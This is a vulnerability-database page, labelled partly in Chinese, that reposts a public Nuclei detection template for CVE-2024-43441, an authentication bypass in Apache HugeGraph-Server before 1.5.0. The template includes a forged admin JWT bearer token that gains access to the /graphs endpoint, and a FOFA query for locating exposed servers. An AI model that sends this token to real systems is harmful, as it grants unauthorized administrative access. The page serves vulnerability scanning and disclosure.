CVE-2024-43441: Apache HugeGraph-Server <1.5.0 - Authentication Bypass

日期: 2025-08-01 | 影响软件: Apache HugeGraph-Server | POC: 已公开

漏洞描述

Apache HugeGraph-Server versions prior to 1.5.0 contain an authentication bypass vulnerability caused by assumed-immutable data. This flaw allows attackers to bypass authentication mechanisms without requiring specific privileges or user interaction.

PoC代码[已公开]

id: CVE-2024-43441

info:
  name: Apache HugeGraph-Server <1.5.0 - Authentication Bypass
  author: wn147
  severity: critical
  description: |
    Apache HugeGraph-Server versions prior to 1.5.0 contain an authentication bypass vulnerability caused by assumed-immutable data. This flaw allows attackers to bypass authentication mechanisms without requiring specific privileges or user interaction.
  impact: |
    Attackers can bypass authentication, gaining unauthorized access to sensitive data or functionalities.
  remediation: |
    Upgrade to Apache HugeGraph-Server version 1.5.0 or later.
  reference:
    - https://github.com/advisories/GHSA-f697-gm3h-xrf9
    - https://github.com/apache/incubator-hugegraph/commit/03b40a52446218c83e98cb43020e0593a744a246
    - https://lists.apache.org/thread/h2607yv32wgcrywov960jpxhvsmmlf12
    - http://www.openwall.com/lists/oss-security/2024/12/24/2
    - https://github.com/J1ezds/Vulnerability-Wiki-page
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-43441
    cwe-id: CWE-302
    epss-score: 0.70462
    epss-percentile: 0.98616
  metadata:
    verified: true
    max-request: 2
    vendor: apache
    product: hugegraph
    fofa-query: title="HugeGraph"
  tags: cve,cve2024,hugegraph,auth-bypass,apache,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /graphs HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 401'
        internal: true

  - raw:
      - |
        GET /graphs HTTP/1.1
        Host: {{Hostname}}
        Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyX25hbWUiOiJhZG1pbiIsInVzZXJfaWQiOiItMzA6YWRtaW4iLCJleHAiOjIwNzE0NzY4MzB9.vb193qf4xpIPFcmCN8J0sRwqUaoS2RAUvFx9uLC-I7Q

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body,"graphs", "hugegraph")'
          - 'contains(header, "application/json")'
        condition: and
# digest: 4a0a00473045022100bb693ca1a8f484b85addc6d6cb5f70fdbab2c2e8a70fbd011affb1c99d5d80040220536ff4cf2c146b1cba329a5722da7419bff94309c4c920edb3106b26e5df3483:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2024/CVE-2024-43441.yaml